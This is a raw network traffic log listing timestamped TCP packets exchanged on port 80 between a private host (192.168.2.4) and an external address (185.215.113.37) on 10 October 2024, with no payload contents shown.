Oct 10, 2024 18:23:11.519618034 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.519627094 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.519640923 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.519642115 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.519670010 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.519680023 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.519860029 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.519870996 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.519881964 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.519896984 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.519906998 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.519918919 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.519921064 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.519938946 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.520040035 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.520147085 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.520165920 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.520178080 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.520207882 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.520250082 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.520313025 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.520333052 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.520343065 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.520364046 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.520390987 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.520500898 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.520513058 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.520524025 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.520535946 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.520569086 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.520642996 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.520656109 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.520673990 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.520685911 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.520689964 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.520695925 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.520703077 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.520761013 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.521001101 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.521014929 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.521024942 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.521054029 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.521066904 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.521081924 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.521092892 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.521110058 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.521123886 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.521130085 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.521152973 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.521153927 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.521173954 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.521176100 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.521193027 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.521195889 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.521220922 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.521250010 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.521259069 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.521260023 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.521270990 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.521281958 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.521290064 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.521291971 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.521318913 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.552767038 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.552886009 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.552917004 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.552930117 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.552944899 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.552958012 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.552964926 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.552973986 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.552990913 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.553031921 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.553065062 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.553076982 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.553091049 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.553105116 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.553111076 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.553119898 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.553134918 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.553137064 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.553162098 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.553210974 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.553430080 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.553442001 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.553456068 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.553468943 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.553477049 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.553482056 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.553495884 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.553505898 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.553509951 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.553524017 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.553529978 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.553538084 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.553550005 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.553551912 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.553564072 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.553589106 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.553622007 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.553864002 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.553877115 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.553905964 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.553921938 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.553946972 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.553960085 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.553992033 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.554011106 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.575556040 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.575576067 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.575588942 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.575634956 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.575659037 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.575726986 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.575737953 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.575745106 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.575757980 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.575802088 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.576061010 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.576271057 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.576322079 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.576334953 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.576348066 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.576375008 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.576394081 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.576478958 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.576489925 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.576503038 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.576514959 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.576530933 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.576565027 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.576571941 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.576601028 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.625345945 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.625372887 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.625387907 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.625396013 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.625421047 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.625435114 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.625449896 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.625463963 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.625478029 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.625492096 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.625507116 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.625507116 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.625520945 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.625535965 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.625551939 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.625566959 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.625571966 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.625581980 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.625600100 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.625602007 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.625617027 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.625629902 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.625631094 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.625647068 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.625655890 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.625660896 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.625683069 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.625690937 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.625705957 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.625706911 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.625720978 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.625736952 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.625741959 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.625752926 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.625768900 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.625780106 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.625783920 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.625798941 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.625806093 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.625816107 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.625828028 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.625871897 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.625957966 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.625973940 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.625988960 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.625999928 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.626002073 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.626024961 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.626034021 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.626040936 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.626055002 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.626070023 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.626071930 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.626085997 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.626100063 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.626100063 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.626116037 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.626123905 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.626131058 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.626144886 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.626146078 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.626158953 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.626176119 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.626184940 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.626189947 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.626205921 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.626219988 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.626220942 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.626236916 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.626250982 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.626251936 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.626267910 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.626276016 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.626282930 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.626296997 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.626298904 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.626312971 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.626343012 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.626364946 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.626729965 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.626745939 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.626761913 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.626775026 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.626777887 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.626816034 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.626842976 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.626848936 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.626858950 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.626873970 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.626887083 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.626888037 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.626903057 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.626912117 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.626918077 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.626931906 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.626935959 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.626948118 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.626961946 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.626976967 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.626977921 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.627005100 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.627027988 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.642518997 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.642544985 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.642559052 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.642584085 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.642611027 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.642664909 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.642678976 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.642692089 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.642704964 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.642704964 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.642740011 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.642832041 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.642844915 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.642858028 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.642873049 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.642900944 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.643007040 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.643019915 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.643033028 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.643043995 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.643045902 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.643110037 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.643126965 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.643152952 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.643167973 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.643212080 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.643225908 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.643239021 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.643250942 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.643251896 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.643265009 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.643276930 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.643277884 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.643291950 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.643317938 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.643317938 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.643354893 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.643552065 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.643563032 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.643574953 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.643589020 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.643601894 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.643615007 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.643615961 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.643626928 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.643650055 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.643656969 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.666454077 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.666465998 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.666476965 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.666488886 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.666500092 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.666511059 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.666522980 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.666532993 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.666533947 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.666558981 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.666564941 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.667001009 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.667046070 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.667052031 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.667063951 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.667082071 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.667098999 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.667165995 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.667174101 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.667179108 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.667188883 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.667213917 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.667238951 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.702477932 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.702487946 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.702497959 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.702510118 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.702519894 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.702532053 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.702542067 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.702553988 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.702557087 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.702564001 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.702579021 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.702589989 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.702596903 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.702603102 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.702615023 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.702617884 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.702629089 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.702636957 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.702641010 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.702652931 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.702656031 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.702663898 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.702677965 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.702687025 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.702687979 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.702699900 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.702711105 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.702721119 CEST	49731	80	192.168.2.4	185.215.113.37
